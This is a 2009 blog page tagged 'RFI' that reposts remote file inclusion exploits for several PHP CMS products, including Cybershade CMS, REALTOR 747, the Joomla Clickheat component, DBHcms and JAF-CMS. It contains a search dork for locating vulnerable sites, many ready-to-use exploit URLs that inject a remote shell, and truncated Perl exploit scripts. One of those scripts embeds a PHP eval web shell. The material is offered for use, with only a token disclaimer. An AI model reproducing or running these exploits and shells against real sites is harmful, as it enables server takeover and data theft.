More Than Just A Blog

Posts Tagged ‘RFI’

Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit

Posted by: Bug Dork on: January 18, 2009

#!/usr/bin/perl
####################################################################
# Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit
# url: http://sourceforge.net/projects/cybershadecms/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com
# team: Spanish Hackers Team – [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# “need” register_globals = On
#
# RFI vuln!: [index.php]
# [...]

REALTOR 747

Posted by: Bug Dork on: January 18, 2009

vul:/include/define.php line 51:

require_once( "$INC_DIR/define_area.php" );

------------------------------------------------------

dork: "REALTOR 747 – Version 4.11"

------------------------------------------------------

xpl:

http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]


Joomla Component Clickheat 1.0.1 Multiple RFI Vulnerabilities

Posted by: Bug Dork on: January 4, 2009

Vulnerable file

administrator/components/com_clickheat/install.clickheat.php
require_once($GLOBALS['mosConfig_absolute_path'].'/administrator/components/com_clickheat/Recly_Config.php');

administrator/components/com_clickheat/includes/heatmap/_main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );

administrator/components/com_clickheat/includes/heatmap/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );

administrator/components/com_clickheat/includes/overview/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );

administrator/components/com_clickheat/Recly/Clickheat/Cache.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

administrator/components/com_clickheat/Recly/common/GlobalVariables.php
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');

[o] Exploit

http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]


DBHcms <= 1.1.4 Remote File Inclusion exploit

Posted by: Bug Dork on: January 1, 2009

#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it’s with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = "http://localhost/s.txt";

print "#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron – randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target [...]


RFI VULN JAF-CMS 4.0 RC2

Posted by: Bug Dork on: January 1, 2009

Script : JAF-CMS 4.0 RC2
Download : SourceForge.net
Method : GET
Critical : High
Impact : System access

http://localhost/path/module/forum/forum.php?website=[SHELL]
http://localhost/path/module/forum/forum.php?main_dir=[SHELL]
http://localhost/path/module/forum/headlines.php?website=[SHELL]
http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
http://localhost/path/module/forum/main.php?website=[SHELL]
http://localhost/path/module/forum/main.php?main_dir=[SHELL]

milw0rm.com


 
